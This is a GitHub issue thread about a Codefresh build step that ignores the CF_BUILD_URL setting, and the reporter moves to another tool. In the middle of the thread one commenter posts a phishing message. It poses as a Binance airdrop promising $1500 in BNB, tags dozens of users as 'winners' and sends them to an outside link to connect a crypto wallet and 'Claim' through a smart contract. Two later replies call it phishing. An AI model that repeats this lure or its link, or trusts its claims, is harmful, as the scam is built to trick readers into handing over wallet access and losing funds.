### ISSUE TITLE
setting CF_BUILD_URL doesn't work

### ISSUE THREAD

**Issue by oreporan** [ydemetriades/cfstep-github-buildstatus#5]
setting `CF_BUILD_URL` doesn't work in the status.
It still uses the codefresh URL, I guess its being overidden

**Comment by ydemetriades** [comment]
Yes, most probably this is the issue but we can change this behavior. I will change the script and submit some changes. I will keep you posted!

**Comment by oreporan** [comment]
Ended up using [this image](https://github.com/cloudposse/github-status-updater#integrating-with-codefresh-cicd-pipelines)
It had the added ability of changing the current build status, not appending a new oneֿֿ

Still - thanks for the build step :)

**Comment by sandeep661** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @FreeWebber, @kekemao00, @NoZiL, @admindivide, @felipezarco, @rtre84, @SeongYunKim, @geosmart, @soone, @jvictorfarias, @nguyenlc1993, @sahil-rathi, @seancfoley, @heinlu, @GitSquared, @jagadeeshwar, @afkvido, @rafalohaki, @DMNerd, @kkpan11, @bozzelliandrea, @z-houbin, @akharrou, @panamantis, @HeWhoDead, @nadavhury, @OoguroxRyuuya, @philmorgan34, @MarkusKluge, @thiagola92, @xdx, @alemansrao, @keathmilligan, @ivensfor, @Milad-Mrz, @brattonross, @xrysanthos, @arthurtayrac, @pbespechnyi, @RyouLmusic, @changuoqiang, @fidanf, @albert-jp, @tonka3000, @laveenrose, @chuckrincon, @apingkk, @mark-omarov, @aim158, @YoshiTheChinchilla

**Comment by felipezarco** [comment]
Looks like phishing

**Comment by thiagola92** [comment]
Smell like phishing
